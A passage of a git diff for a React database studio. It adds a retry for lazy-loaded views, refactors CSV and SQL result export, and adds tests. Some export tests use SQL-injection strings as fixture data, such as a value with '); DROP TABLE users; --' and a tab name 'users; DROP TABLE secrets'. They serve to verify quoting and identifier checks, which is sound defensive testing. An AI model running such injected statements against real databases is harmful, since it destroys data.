+ * more request that can fail", and this product is deployed where that request is
+ * least reliable: behind corporate proxies, on air-gapped networks, and — the case
+ * that costs a user their place — across an upgrade. A tab left open still asks for
+ * the chunk names the page was built with, and the container it is talking to has
+ * replaced them, so the request 404s and the view never arrives.
+ *
+ * One retry, after a short delay, is what separates a transient blip from a genuinely
+ * missing file. A second failure is reported to the boundary above, which can say so
+ * (`src/components/LazyView.tsx`) instead of leaving a spinner running forever.
+ */
+const RETRY_DELAY_MS = 400;
+
+export function lazyRetry<T>(load: () => Promise<T>): () => Promise<T> {
+  return async () => {
+    try {
+      return await load();
+    } catch (error) {
+      logger.warn("A split view did not load; retrying once", {
+        route: "lazy",
+        error: error instanceof Error ? error.message : String(error),
+      });
+      await new Promise((resolve) => setTimeout(resolve, RETRY_DELAY_MS));
+      return load();
+    }
+  };
+}

--- a/src/workspace/StudioWorkspace.tsx
+++ b/src/workspace/StudioWorkspace.tsx
@@ -18,6 +18,8 @@ import { useConnectionAdapter } from "@/workspace/hooks/use-connection-adapter";
 import { useQueryAdapter } from "@/workspace/hooks/use-query-adapter";
 import { type StudioWorkspaceProps, DEFAULT_WORKSPACE_FEATURES } from "@/workspace/types";
 import { cn } from "@/lib/utils";
+import { ChunkBoundary, ViewLoading } from "@/components/LazyView";
+import { lazyRetry } from "@/lib/lazy";
 import { buildResultExport, type ResultExportFormat } from "@/lib/export/result-export";
 import { downloadText } from "@/lib/export/download";
 
@@ -25,8 +27,8 @@ import { downloadText } from "@/lib/export/download";
 // engine + the snapdom capture), and it is mounted only while `showDiagram` is true.
 // Split for the same reason the bottom panel's heavy views are, and through the same
 // `React.lazy` seam — this shell imports nothing from `next` by construction.
-const SchemaDiagram = React.lazy(() =>
-  import("@/components/SchemaDiagram").then((m) => ({ default: m.SchemaDiagram })),
+const SchemaDiagram = React.lazy(
+  lazyRetry(() => import("@/components/SchemaDiagram").then((m) => ({ default: m.SchemaDiagram }))),
 );
 
 /**
@@ -256,6 +258,9 @@ export function StudioWorkspace({
         // after the host switched connections quoted its literals for whichever
         // engine happened to be active on the first render.
         dialect: conn.activeConnection?.type,
+        // The host's own declared column types (`use-query-adapter` carries them),
+        // which the DDL form prefers over a type guessed from a value.
+        columnTypes: tabMgr.currentTab.result.columnTypes,
       });
       downloadText(file.content, file.mimeType, `query_result_export.${file.extension}`);
     },
@@ -331,9 +336,17 @@ export function StudioWorkspace({
               {features.schemaDiagram && (
                 <AnimatePresence>
                   {showDiagram && (
-                    <React.Suspense fallback={null}>
-                      <SchemaDiagram schema={conn.schema} onClose={() => setShowDiagram(false)} />
-                    </React.Suspense>
+                    // A visible fallback and a boundary, for the reason spelled out at
+                    // the same mount in `src/components/Studio.tsx`: this is the
+                    // heaviest chunk, and it is fetched from whatever base the
+                    // embedding host serves the package's assets from.
+                    <ChunkBoundary label="The diagram">
+                      <React.Suspense
+                        fallback={<ViewLoading label="Loading the diagram" className="absolute inset-0 z-20" />}
+                      >
+                        <SchemaDiagram schema={conn.schema} onClose={() => setShowDiagram(false)} />
+                      </React.Suspense>
+                    </ChunkBoundary>
                   )}
                 </AnimatePresence>
               )}

--- a/src/workspace/StudioWorkspace.tsx
+++ b/src/workspace/StudioWorkspace.tsx
@@ -9,7 +9,6 @@ import { QuerySafetyDialog } from "@/components/QuerySafetyDialog";
 import { DataProfiler } from "@/components/DataProfiler";
 import { CodeGenerator } from "@/components/CodeGenerator";
 import { TestDataGenerator } from "@/components/TestDataGenerator";
-import { SchemaDiagram } from "@/components/SchemaDiagram";
 import { SaveQueryModal } from "@/components/SaveQueryModal";
 import { StudioTabBar, QueryToolbar, BottomPanel } from "@/components/studio/index";
 import type { MaskingConfig } from "@/lib/data-masking";
@@ -19,7 +18,16 @@ import { useConnectionAdapter } from "@/workspace/hooks/use-connection-adapter";
 import { useQueryAdapter } from "@/workspace/hooks/use-query-adapter";
 import { type StudioWorkspaceProps, DEFAULT_WORKSPACE_FEATURES } from "@/workspace/types";
 import { cn } from "@/lib/utils";
-import { quoteLiteral } from "@/lib/sql/values";
+import { buildResultExport, type ResultExportFormat } from "@/lib/export/result-export";
+import { downloadText } from "@/lib/export/download";
+
+// The ERD is the largest thing this shell can mount (`@xyflow/react` + the elk layout
+// engine + the snapdom capture), and it is mounted only while `showDiagram` is true.
+// Split for the same reason the bottom panel's heavy views are, and through the same
+// `React.lazy` seam — this shell imports nothing from `next` by construction.
+const SchemaDiagram = React.lazy(() =>
+  import("@/components/SchemaDiagram").then((m) => ({ default: m.SchemaDiagram })),
+);
 
 /**
  * Scoped CSS for the shadcn token set studio's primitives read.
@@ -236,81 +244,22 @@ export function StudioWorkspace({
     [conn.activeConnection, tabMgr.currentTab.query, onSaveQueryProp, toast],
   );
 
-  // === Export results (simplified, no masking) ===
+  // === Export results (shared writers; this shell applies no masking) ===
   const exportResults = useCallback(
-    (format: "csv" | "json" | "sql-insert" | "sql-ddl") => {
+    (format: ResultExportFormat) => {
       if (!tabMgr.currentTab.result) return;
-      const data = tabMgr.currentTab.result.rows;
-      let content = "";
-      let mimeType = "text/plain";
-      let ext: string = format;
-
-      if (format === "csv") {
-        const headers = Object.keys(data[0] || {}).join(",");
-        const rows = data
-          .map((row) =>
-            Object.values(row)
-              .map((val) => `"${val}"`)
-              .join(","),
-          )
-          .join("\n");
-        content = `${headers}\n${rows}`;
-        mimeType = "text/csv";
-        ext = "csv";
-      } else if (format === "json") {
-        content = JSON.stringify(data, null, 2);
-        mimeType = "application/json";
-        ext = "json";
-      } else if (format === "sql-insert") {
-        const tableName = tabMgr.currentTab.name.replace(/^Query[: ]*/, "") || "table_name";
-        const columns = Object.keys(data[0] || {});
-        const lines = data.map((row) => {
-          const values = columns.map((col) => {
-            const val = row[col];
-            if (val === null || val === undefined) return "NULL";
-            if (typeof val === "number" || typeof val === "boolean") return String(val);
-            // The exported file is SQL that runs somewhere later, usually
-            // unattended, and every value in it is data the table held. Quoting is
-            // the connected engine's own: doubling the quote alone would let a
-            // value ending in a backslash close its literal and have the rest of
-            // the file read as statements (#290).
-            return quoteLiteral(String(val), conn.activeConnection?.type);
-          });
-          return `INSERT INTO ${tableName} (${columns.join(", ")}) VALUES (${values.join(", ")});`;
-        });
-        content = lines.join("\n");
-        mimeType = "text/sql";
-        ext = "sql";
-      } else if (format === "sql-ddl") {
-        const tableName = tabMgr.currentTab.name.replace(/^Query[: ]*/, "") || "table_name";
-        const columns = Object.keys(data[0] || {});
-        const colDefs = columns.map((col) => {
-          const sampleVal = data[0]?.[col];
-          let sqlType = "TEXT";
-          if (typeof sampleVal === "number") {
-            sqlType = Number.isInteger(sampleVal) ? "INTEGER" : "NUMERIC";
-          } else if (typeof sampleVal === "boolean") {
-            sqlType = "BOOLEAN";
-          } else if (sampleVal instanceof Date) {
-            sqlType = "TIMESTAMP";
-          }
-          return `  ${col} ${sqlType}`;
-        });
-        content = `CREATE TABLE ${tableName} (\n${colDefs.join(",\n")}\n);`;
-        mimeType = "text/sql";
-        ext = "sql";
-      }
-
-      const fileName = `query_result_export.${ext}`;
-      const blob = new Blob([content], { type: mimeType });
-      const url = URL.createObjectURL(blob);
-      const link = document.createElement("a");
-      link.href = url;
-      link.download = fileName;
-      link.click();
-      URL.revokeObjectURL(url);
+      const file = buildResultExport(format, {
+        rows: tabMgr.currentTab.result.rows,
+        fields: tabMgr.currentTab.result.fields,
+        tabName: tabMgr.currentTab.name,
+        // Was missing from this callback's dependencies, so a SQL export written
+        // after the host switched connections quoted its literals for whichever
+        // engine happened to be active on the first render.
+        dialect: conn.activeConnection?.type,
+      });
+      downloadText(file.content, file.mimeType, `query_result_export.${file.extension}`);
     },
-    [tabMgr.currentTab],
+    [tabMgr.currentTab, conn.activeConnection?.type],
   );
 
   // === Table click handler ===
@@ -381,7 +330,11 @@ export function StudioWorkspace({
               {/* Schema Diagram overlay */}
               {features.schemaDiagram && (
                 <AnimatePresence>
-                  {showDiagram && <SchemaDiagram schema={conn.schema} onClose={() => setShowDiagram(false)} />}
+                  {showDiagram && (
+                    <React.Suspense fallback={null}>
+                      <SchemaDiagram schema={conn.schema} onClose={() => setShowDiagram(false)} />
+                    </React.Suspense>
+                  )}
                 </AnimatePresence>
               )}
 

--- a/tests/components/LazyView.test.tsx
+++ b/tests/components/LazyView.test.tsx
@@ -1,0 +1,76 @@
+import { describe, test, expect, afterEach, mock } from "bun:test";
+import { render, fireEvent, cleanup } from "@testing-library/react";
+import React from "react";
+
+import { ChunkBoundary, ViewLoading } from "@/components/LazyView";
+
+afterEach(() => {
+  cleanup();
+});
+
+describe("ViewLoading", () => {
+  test("announces what is loading in a live region", () => {
+    const { getByTestId } = render(<ViewLoading label="Loading the panel" />);
+
+    const region = getByTestId("view-loading");
+    // `output` carries the live region natively, which is what jsx-a11y's
+    // prefer-tag-over-role asks for instead of a div with role="status".
+    expect(region.tagName).toBe("OUTPUT");
+    expect(region.getAttribute("aria-label")).toBe("Loading the panel");
+  });
+
+  test("takes the caller's positioning, so the diagram can cover its own overlay", () => {
+    const { getByTestId } = render(<ViewLoading label="Loading the diagram" className="absolute inset-0" />);
+
+    expect(getByTestId("view-loading").className).toContain("absolute inset-0");
+  });
+});
+
+function Boom(): React.ReactElement {
+  throw new Error("Loading chunk 42 failed");
+}
+
+describe("ChunkBoundary", () => {
+  test("renders its children while nothing has failed", () => {
+    const { getByText, queryByTestId } = render(
+      <ChunkBoundary label="This view">
+        <p>the chart</p>
+      </ChunkBoundary>,
+    );
+
+    expect(getByText("the chart")).toBeTruthy();
+    expect(queryByTestId("chunk-error")).toBeNull();
+  });
+
+  // The failure this exists for: the view is no longer in the bundle that already
+  // loaded, so its arrival is a request — and a request that never completes used to
+  // leave a spinner running with nothing said.
+  test("names the view that could not be loaded instead of leaving a spinner", () => {
+    const { getByTestId, getByText } = render(
+      <ChunkBoundary label="Charts">
+        <Boom />
+      </ChunkBoundary>,
+    );
+
+    expect(getByTestId("chunk-error")).toBeTruthy();
+    expect(getByText("Charts could not be loaded.")).toBeTruthy();
+  });
+
+  test("offers the remedy that actually works: re-fetching the document", () => {
+    const reload = mock(() => {});
+    const original = window.location.reload;
+    Object.defineProperty(window.location, "reload", { value: reload, configurable: true });
+    try {
+      const { getByText } = render(
+        <ChunkBoundary label="Charts">
+          <Boom />
+        </ChunkBoundary>,
+      );
+      fireEvent.click(getByText("Reload"));
+    } finally {
+      Object.defineProperty(window.location, "reload", { value: original, configurable: true });
+    }
+
+    expect(reload).toHaveBeenCalledTimes(1);
+  });
+});

--- a/tests/components/SchemaDiff.test.tsx
+++ b/tests/components/SchemaDiff.test.tsx
@@ -198,9 +198,10 @@ mock.module("@/hooks/use-all-connections", () => ({
 
 // ── Imports AFTER mocks ──────────────────────────────────────────────────────
 
-import { describe, test, expect, beforeEach, afterEach } from "bun:test";
+import { describe, test, expect, beforeEach, afterEach, spyOn } from "bun:test";
 import { render, fireEvent, cleanup, act } from "@testing-library/react";
 import { SchemaDiff } from "@/components/SchemaDiff";
+import { logger } from "@/lib/logger";
 import { mockSchema } from "../fixtures/schemas";
 import { mockPostgresConnection } from "../fixtures/connections";
 
@@ -912,9 +913,10 @@ describe("SchemaDiff", () => {
 
     test("handles fetch error gracefully", async () => {
       const origFetch = globalThis.fetch;
-      const origError = console.error;
-      const mockConsoleError = mock(() => {});
-      console.error = mockConsoleError;
+      // The failure goes to the shared logger, not to `console` — every other
+      // component/hook in this tree reports through it, and a bare console call is
+      // invisible to whatever the operator has wired the logger up to.
+      const warn = spyOn(logger, "warn").mockImplementation(() => {});
 
       globalThis.fetch = mock(() =>
         Promise.resolve({
@@ -931,11 +933,11 @@ describe("SchemaDiff", () => {
           fn!("conn:remote-1");
         });
 
-        expect(mockConsoleError).toHaveBeenCalled();
+        expect(warn).toHaveBeenCalled();
         expect(mockSaveSchemaSnapshot).not.toHaveBeenCalled();
       } finally {
         globalThis.fetch = origFetch;
-        console.error = origError;
+        warn.mockRestore();
       }
     });
   });

--- a/tests/components/SchemaDiff.test.tsx
+++ b/tests/components/SchemaDiff.test.tsx
@@ -753,6 +753,49 @@ describe("SchemaDiff", () => {
       expect(queryByText("Foreign Keys")).toBeNull();
     });
 
+    // A foreign key REPOINTED at another table is two entries under one column name:
+    // the diff engine keys an FK by `columnName→table.column` (`diff-engine.ts`), so
+    // it reports the old one removed and the new one added. Keying the rows by the
+    // column name alone gave React two children with the same key — one row, and the
+    // half of the change the user needed to see missing.
+    test("renders both halves of a foreign key that was repointed", () => {
+      mockDiffSchemas.mockImplementation(() =>
+        structuredClone({
+          tables: [
+            {
+              action: "modified",
+              tableName: "users",
+              columns: [],
+              indexes: [],
+              foreignKeys: [
+                { action: "removed", columnName: "org_id", changes: ["Removed FK: org_id -> orgs(id)"] },
+                { action: "added", columnName: "org_id", changes: ["Added FK: org_id -> tenants(id)"] },
+              ],
+            },
+          ],
+          summary: { added: 0, removed: 0, modified: 1 },
+          hasChanges: true,
+        }),
+      );
+      const complaints: string[] = [];
+      const originalError = console.error;
+      console.error = (...args: unknown[]) => {
+        complaints.push(args.map(String).join(" "));
+      };
+      try {
+        const { getByText, getAllByText } = renderDiff();
+        changeTarget("snap-1");
+        fireEvent.click(getByText("users"));
+
+        expect(getAllByText("org_id")).toHaveLength(2);
+        expect(getByText("Removed FK: org_id -> orgs(id)")).toBeTruthy();
+        expect(getByText("Added FK: org_id -> tenants(id)")).toBeTruthy();
+      } finally {
+        console.error = originalError;
+      }
+      expect(complaints.filter((line) => line.includes("same key"))).toEqual([]);
+    });
+
     test("renders no action icon for unknown column action", () => {
       mockDiffSchemas.mockImplementation(() =>
         structuredClone({

--- a/tests/components/Studio.test.tsx
+++ b/tests/components/Studio.test.tsx
@@ -816,9 +816,32 @@ describe("Studio", () => {
     const exportFn = capturedBottomPanelProps.onExportResults as (format: string) => void;
     act(() => exportFn("csv"));
     expect(mockCreateObjectURL).toHaveBeenCalledTimes(1);
-    expect(mockRevokeObjectURL).toHaveBeenCalledTimes(1);
     const blob = (mockCreateObjectURL.mock.calls[0] as unknown[])[0] as Blob;
     expect(blob.type).toBe("text/csv");
+  });
+
+  // The blob URL outlives the task that started the download: revoking it in the
+  // same task can pull the data out from under a read that has not begun.
+  test("exportResults revokes the blob URL only after the download is handed off", async () => {
+    tabMgrOverride = {
+      currentTab: {
+        id: "tab-1",
+        name: "Users",
+        query: "SELECT 1",
+        result: testResult,
+        isExecuting: false,
+        type: "sql",
+      },
+    };
+    render(<Studio />);
+    const exportFn = capturedBottomPanelProps.onExportResults as (format: string) => void;
+    act(() => exportFn("csv"));
+
+    expect(mockRevokeObjectURL).not.toHaveBeenCalled();
+    await act(async () => {
+      await new Promise((resolve) => setTimeout(resolve, 0));
+    });
+    expect(mockRevokeObjectURL).toHaveBeenCalled();
   });
 
   test("exportResults JSON creates application/json blob", () => {
@@ -885,9 +908,33 @@ describe("Studio", () => {
     act(() => exportFn("sql-insert"));
 
     const blob = (mockCreateObjectURL.mock.calls[0] as unknown[])[0] as Blob;
+    // The column names are quoted the way the connected dialect spells an
+    // identifier, so an aliased column cannot end the list it sits in either.
     expect(await blob.text()).toBe(
-      "INSERT INTO Users (id, path) VALUES (1, 'C:\\\\Users\\\\''); DROP TABLE users; --');",
+      "INSERT INTO Users (`id`, `path`) VALUES (1, 'C:\\\\Users\\\\''); DROP TABLE users; --');",
     );
+  });
+
+  // The table name is GUESSED from the tab title, so it is never quoted — quoting
+  // would pin a case the database may not use. What a guess must not do is carry
+  // statement text, so a title that is not an identifier is refused outright.
+  test("exportResults sql-insert refuses a tab name that is not an identifier", async () => {
+    tabMgrOverride = {
+      currentTab: {
+        id: "tab-1",
+        name: "users; DROP TABLE secrets",
+        query: "SELECT 1",
+        result: { rows: [{ id: 1 }], fields: ["id"], rowCount: 1, executionTime: 1 },
+        isExecuting: false,
+        type: "sql",
+      },
+    };
+    render(<Studio />);
+    const exportFn = capturedBottomPanelProps.onExportResults as (format: string) => void;
+    act(() => exportFn("sql-insert"));
+
+    const blob = (mockCreateObjectURL.mock.calls[0] as unknown[])[0] as Blob;
+    expect(await blob.text()).toBe('INSERT INTO table_name ("id") VALUES (1);');
   });
 
   test("exportResults sql-ddl creates text/sql blob", () => {
@@ -940,11 +987,13 @@ describe("Studio", () => {
     expect(mockRouterPush).toHaveBeenCalledWith("/monitoring");
   });
 
-  test("CommandPalette onShowDiagram opens diagram", () => {
+  // Awaited because the diagram is code-split: opening it resolves a dynamic import
+  // before the component can mount.
+  test("CommandPalette onShowDiagram opens diagram", async () => {
     const { queryByTestId } = render(<Studio />);
     expect(queryByTestId("schemadiagram")).toBeNull();
     const fn = capturedCommandPaletteProps.onShowDiagram as () => void;
-    act(() => fn());
+    await act(async () => fn());
     expect(queryByTestId("schemadiagram")).not.toBeNull();
   });
 
@@ -1107,11 +1156,11 @@ describe("Studio", () => {
     expect(queryByTestId("createtablemodal")).not.toBeNull();
   });
 
-  test("Sidebar onShowDiagram opens schema diagram", () => {
+  test("Sidebar onShowDiagram opens schema diagram", async () => {
     const { queryByTestId } = render(<Studio />);
     expect(queryByTestId("schemadiagram")).toBeNull();
     const fn = capturedSidebarProps.onShowDiagram as () => void;
-    act(() => fn());
+    await act(async () => fn());
     expect(queryByTestId("schemadiagram")).not.toBeNull();
   });
 
@@ -1235,8 +1284,8 @@ describe("Studio", () => {
     expect(mockCreateObjectURL).toHaveBeenCalledTimes(1);
     const blob = (mockCreateObjectURL.mock.calls[0] as unknown[])[0] as Blob;
     const content = await blob.text();
-    expect(content).toContain("active BOOLEAN");
-    expect(content).toContain("created TIMESTAMP");
+    expect(content).toContain('"active" BOOLEAN');
+    expect(content).toContain('"created" TIMESTAMP');
   });
 
   // --- Mobile: database tab ---

--- a/tests/components/Studio.test.tsx
+++ b/tests/components/Studio.test.tsx
@@ -817,7 +817,8 @@ describe("Studio", () => {
     act(() => exportFn("csv"));
     expect(mockCreateObjectURL).toHaveBeenCalledTimes(1);
     const blob = (mockCreateObjectURL.mock.calls[0] as unknown[])[0] as Blob;
-    expect(blob.type).toBe("text/csv");
+    // The charset is stated on the type as well as written as a BOM in the bytes.
+    expect(blob.type).toBe("text/csv;charset=utf-8");
   });
 
   // The blob URL outlives the task that started the download: revoking it in the

--- a/tests/components/StudioWorkspace.test.tsx
+++ b/tests/components/StudioWorkspace.test.tsx
@@ -550,12 +550,28 @@ describe("StudioWorkspace", () => {
     renderWorkspace();
     act(() => (capturedBottomPanelProps.onExportResults as (f: string) => void)("csv"));
     expect(mockCreateObjectURL).toHaveBeenCalledTimes(1);
-    expect(mockRevokeObjectURL).toHaveBeenCalledTimes(1);
     const blob = mockCreateObjectURL.mock.calls[0][0] as Blob;
     expect(blob.type).toBe("text/csv");
     const text = await blob.text();
     expect(text).toContain("id,name,ratio,active,created,deleted");
-    expect(text).toContain('"Alice"');
+    // A value is quoted only where RFC 4180 requires it, and NULL is an empty
+    // field rather than the four letters of the word.
+    expect(text).toContain("1,Alice,0.5,true,");
+    expect(text.split("\n")[1].endsWith(",")).toBe(true);
+  });
+
+  // The blob URL outlives the task that started the download: revoking it in the
+  // same task can pull the data out from under a read that has not begun.
+  test("exportResults does not revoke the blob URL before the download is handed off", async () => {
+    withExportResult();
+    renderWorkspace();
+    act(() => (capturedBottomPanelProps.onExportResults as (f: string) => void)("csv"));
+
+    expect(mockRevokeObjectURL).not.toHaveBeenCalled();
+    await act(async () => {
+      await new Promise((resolve) => setTimeout(resolve, 0));
+    });
+    expect(mockRevokeObjectURL).toHaveBeenCalled();
   });
 
   test("exportResults json creates an application/json blob", async () => {
@@ -603,12 +619,14 @@ describe("StudioWorkspace", () => {
     act(() => (capturedBottomPanelProps.onExportResults as (f: string) => void)("sql-insert"));
 
     const blob = mockCreateObjectURL.mock.calls[0][0] as Blob;
+    // The column names are quoted the way the connected dialect spells an
+    // identifier, so an aliased column cannot end the list it sits in either.
     expect(await blob.text()).toBe(
-      "INSERT INTO users (id, path) VALUES (1, 'C:\\\\Users\\\\''); DROP TABLE users; --');",
+      "INSERT INTO users (`id`, `path`) VALUES (1, 'C:\\\\Users\\\\''); DROP TABLE users; --');",
     );
   });
 
-  test("exportResults sql-ddl infers column types from the first row", async () => {
+  test("exportResults sql-ddl infers column types from the first row that carries a value", async () => {
     withExportResult();
     renderWorkspace();
     act(() => (capturedBottomPanelProps.onExportResults as (f: string) => void)("sql-ddl"));
@@ -616,11 +634,14 @@ describe("StudioWorkspace", () => {
     expect(blob.type).toBe("text/sql");
     const text = await blob.text();
     expect(text).toContain("CREATE TABLE users");
-    expect(text).toContain("id INTEGER");
-    expect(text).toContain("ratio NUMERIC");
-    expect(text).toContain("active BOOLEAN");
-    expect(text).toContain("created TIMESTAMP");
-    expect(text).toContain("name TEXT");
+    expect(text).toContain('"id" INTEGER');
+    expect(text).toContain('"ratio" NUMERIC');
+    expect(text).toContain('"active" BOOLEAN');
+    expect(text).toContain('"created" TIMESTAMP');
+    expect(text).toContain('"name" TEXT');
+    // `deleted` is null in row 1 and a string in row 2: the type comes from the
+    // row that actually carries a value, not from row 0.
+    expect(text).toContain('"deleted" TEXT');
   });
 
   test("exportResults does nothing without a result", () => {
@@ -651,10 +672,12 @@ describe("StudioWorkspace", () => {
     act(() => (capturedSidebarProps.onOpenMaintenance as () => void)());
   });
 
-  test("onShowDiagram opens the schema diagram and onClose closes it", () => {
+  // Awaited because the diagram is code-split: opening it resolves a dynamic import
+  // before the component can mount.
+  test("onShowDiagram opens the schema diagram and onClose closes it", async () => {
     const { queryByTestId } = renderWorkspace();
     expect(queryByTestId("schemadiagram")).toBeNull();
-    act(() => (capturedSidebarProps.onShowDiagram as () => void)());
+    await act(async () => (capturedSidebarProps.onShowDiagram as () => void)());
     expect(queryByTestId("schemadiagram")).not.toBeNull();
     act(() => (capturedSchemaDiagramProps.onClose as () => void)());
     expect(queryByTestId("schemadiagram")).toBeNull();

--- a/tests/components/StudioWorkspace.test.tsx
+++ b/tests/components/StudioWorkspace.test.tsx
@@ -551,7 +551,7 @@ describe("StudioWorkspace", () => {
     act(() => (capturedBottomPanelProps.onExportResults as (f: string) => void)("csv"));
     expect(mockCreateObjectURL).toHaveBeenCalledTimes(1);
     const blob = mockCreateObjectURL.mock.calls[0][0] as Blob;
-    expect(blob.type).toBe("text/csv");
+    expect(blob.type).toBe("text/csv;charset=utf-8");
     const text = await blob.text();
     expect(text).toContain("id,name,ratio,active,created,deleted");
     // A value is quoted only where RFC 4180 requires it, and NULL is an empty
@@ -634,8 +634,10 @@ describe("StudioWorkspace", () => {
     expect(blob.type).toBe("text/sql");
     const text = await blob.text();
     expect(text).toContain("CREATE TABLE users");
-    expect(text).toContain('"id" INTEGER');
-    expect(text).toContain('"ratio" NUMERIC');
+    expect(text).toContain('"id" BIGINT');
+    // A JS non-integer is a double, and `NUMERIC` without a scale truncates it on
+    // MySQL and SQL Server — so the inferred type is spelled per dialect now.
+    expect(text).toContain('"ratio" DOUBLE PRECISION');
     expect(text).toContain('"active" BOOLEAN');
     expect(text).toContain('"created" TIMESTAMP');
     expect(text).toContain('"name" TEXT');

--- a/tests/components/studio/BottomPanel.test.tsx
+++ b/tests/components/studio/BottomPanel.test.tsx
@@ -403,6 +403,54 @@ describe("BottomPanel", () => {
     expect(queryByText("Export")).not.toBeNull();
   });
 
+  // An export writes the rows the grid HOLDS, and the grid holds one page. The count
+  // is on the button because a file of 500 rows off a table of two million is
+  // indistinguishable from a complete answer once it has left the product.
+  test("Export button carries the number of rows the file will contain", () => {
+    const props = createDefaultProps({
+      mode: "results",
+      currentTab: {
+        id: "tab-1",
+        name: "Q",
+        query: "SELECT 1",
+        result: {
+          rows: Array.from({ length: 1234 }, (_, i) => ({ id: i })),
+          fields: ["id"],
+          rowCount: 1234,
+          executionTime: 42,
+        },
+        isExecuting: false,
+        type: "sql" as const,
+      },
+    });
+    const { getByTestId } = render(<BottomPanel {...(props as React.ComponentProps<typeof BottomPanel>)} />);
+    expect(getByTestId("export-row-count").textContent).toBe("1,234");
+  });
+
+  test("Export button counts the loaded rows, not the number the run reported", () => {
+    const props = createDefaultProps({
+      mode: "results",
+      currentTab: {
+        id: "tab-1",
+        name: "Q",
+        query: "SELECT 1",
+        result: {
+          rows: [{ id: 1 }, { id: 2 }],
+          fields: ["id"],
+          // An engine can report a different count than the rows it handed back;
+          // only the rows are written to the file.
+          rowCount: 900,
+          executionTime: 42,
+          pagination: { limit: 2, offset: 0, hasMore: true, totalReturned: 2, wasLimited: true },
+        },
+        isExecuting: false,
+        type: "sql" as const,
+      },
+    });
+    const { getByTestId } = render(<BottomPanel {...(props as React.ComponentProps<typeof BottomPanel>)} />);
+    expect(getByTestId("export-row-count").textContent).toBe("2");
+  });
+
   test("Export dropdown is hidden when result is null", () => {
     const props = createDefaultProps({ mode: "results" });
     const { queryByText } = render(<BottomPanel {...(props as React.ComponentProps<typeof BottomPanel>)} />);

--- a/tests/components/studio/BottomPanel.test.tsx
+++ b/tests/components/studio/BottomPanel.test.tsx
@@ -148,8 +148,8 @@ mock.module("@/lib/storage", () => ({
 
 // ---- Now import bun:test, testing-library, and the component ----
 
-import { describe, test, expect, afterEach } from "bun:test";
-import { render, fireEvent, cleanup } from "@testing-library/react";
+import { describe, test, expect, afterEach, beforeAll } from "bun:test";
+import { render, fireEvent, cleanup, act } from "@testing-library/react";
 import React from "react";
 
 import { BottomPanel } from "@/components/studio/BottomPanel";
@@ -215,6 +215,23 @@ function createDefaultProps(overrides: Partial<Record<string, unknown>> = {}) {
 }
 
 describe("BottomPanel", () => {
+  /*
+    The panel's heavy views are code-split (`React.lazy` in BottomPanel.tsx), so the
+    FIRST render of each one suspends while its dynamic import resolves. `React.lazy`
+    caches that resolution on the lazy component itself, so mounting each one once here
+    — inside an awaited `act` — is what lets the assertions below stay synchronous and,
+    more importantly, stay independent of the order the tests happen to run in.
+  */
+  beforeAll(async () => {
+    for (const mode of ["charts", "pivot", "docs", "schemadiff", "explain"] as const) {
+      const props = createDefaultProps({ mode });
+      await act(async () => {
+        render(<BottomPanel {...(props as React.ComponentProps<typeof BottomPanel>)} />);
+      });
+    }
+    cleanup();
+  });
+
   afterEach(() => {
     cleanup();
   });

--- a/tests/hooks/use-query-execution.test.ts
+++ b/tests/hooks/use-query-execution.test.ts
@@ -1607,6 +1607,64 @@ describe("useQueryExecution", () => {
     expect(tabWithPlan?.explainPlan).toEqual({ format: "postgres-json", raw: { plan: "Seq Scan" } });
   });
 
+  // ── a background EXPLAIN that outlives BOTH runs (docs/BACKLOG.md U1) ──────
+  //
+  // Ownership cannot be read from the in-flight map: the run deletes its own entry
+  // when it settles, so an EXPLAIN resolving after its query finished AND after a
+  // later query finished finds nothing there. Reading an absent entry as "not
+  // superseded" is what let the first run's plan land on the second run's results.
+
+  test("a background EXPLAIN resolving after a later run has finished does not overwrite its plan", async () => {
+    let releaseFirstExplain: () => void = () => {};
+    const firstExplainGate = new Promise<void>((resolve) => {
+      releaseFirstExplain = resolve;
+    });
+    let explainCount = 0;
+
+    mockGlobalFetch({
+      "/api/db/query": async (req) => {
+        const body = (await req.json()) as { sql: string };
+        if (!body.sql.toUpperCase().startsWith("EXPLAIN")) {
+          return { ok: true, json: mockQueryResult };
+        }
+        explainCount += 1;
+        if (explainCount === 1) {
+          // The first run's plan is still in flight while the second run starts,
+          // runs, and finishes.
+          await firstExplainGate;
+          return { ok: true, json: { rows: [{ "QUERY PLAN": { plan: "stale" } }], fields: ["QUERY PLAN"] } };
+        }
+        return { ok: true, json: { rows: [{ "QUERY PLAN": { plan: "current" } }], fields: ["QUERY PLAN"] } };
+      },
+    });
+
+    const snapshots: QueryTab[][] = [];
+    const setTabsMock = mock((fn: unknown) => {
+      if (typeof fn === "function") {
+        snapshots.push(fn([createTab()]));
+      }
+    });
+    const { result } = renderHook(() => useQueryExecution(createDefaultParams({ setTabs: setTabsMock })));
+
+    await act(async () => {
+      await result.current.executeQuery("SELECT * FROM users");
+    });
+    await act(async () => {
+      await result.current.executeQuery("SELECT * FROM orders");
+    });
+
+    act(() => releaseFirstExplain());
+    await act(async () => {
+      await new Promise((resolve) => setTimeout(resolve, 50));
+    });
+
+    const plans = snapshots
+      .map((snapshot) => snapshot[0].explainPlan as { raw?: { plan?: string } } | null | undefined)
+      .filter((plan): plan is { raw?: { plan?: string } } => Boolean(plan));
+    expect(plans.some((plan) => plan.raw?.plan === "current")).toBe(true);
+    expect(plans.some((plan) => plan.raw?.plan === "stale")).toBe(false);
+  });
+
   // ── setTabs updaters preserve non-target tabs ──────────────────────────
 
   test("QUERY_CANCELLED updater preserves non-target tabs", async () => {

--- a/tests/run-components.sh
+++ b/tests/run-components.sh
@@ -226,6 +226,7 @@ run_group "Group 11/12: Smoke tests" \
   tests/components/DataImportModal.test.tsx \
   tests/components/RootLayout.test.tsx \
   tests/components/AppErrorPages.test.tsx \
+  tests/components/LazyView.test.tsx \
   tests/components/Page.test.tsx \
   tests/components/LoginPage.test.tsx \
   tests/components/LoginPageOIDC.test.tsx \

--- a/tests/unit/lib/export/csv.test.ts
+++ b/tests/unit/lib/export/csv.test.ts
@@ -85,3 +85,42 @@ describe("toCsv", () => {
     expect(toCsv([], ["a", "b"])).toBe("a,b");
   });
 });
+
+describe("toCsv — a column name that is also a prototype member", () => {
+  // `row[column]` walks the prototype chain, so a column the row does not carry
+  // resolved to an INHERITED member: a header named `constructor` wrote
+  // "function Object() { [native code] }" into every row that lacked the field.
+  // Document stores hand back rows that do not share a shape, which is exactly
+  // where a header can name a field a given row has no own entry for.
+  test("writes an empty field for a prototype-named column the row does not carry", () => {
+    const csv = toCsv([{ constructor: "declared", id: 1 }, { id: 2 }]);
+    expect(csv).toBe("constructor,id\ndeclared,1\n,2");
+  });
+
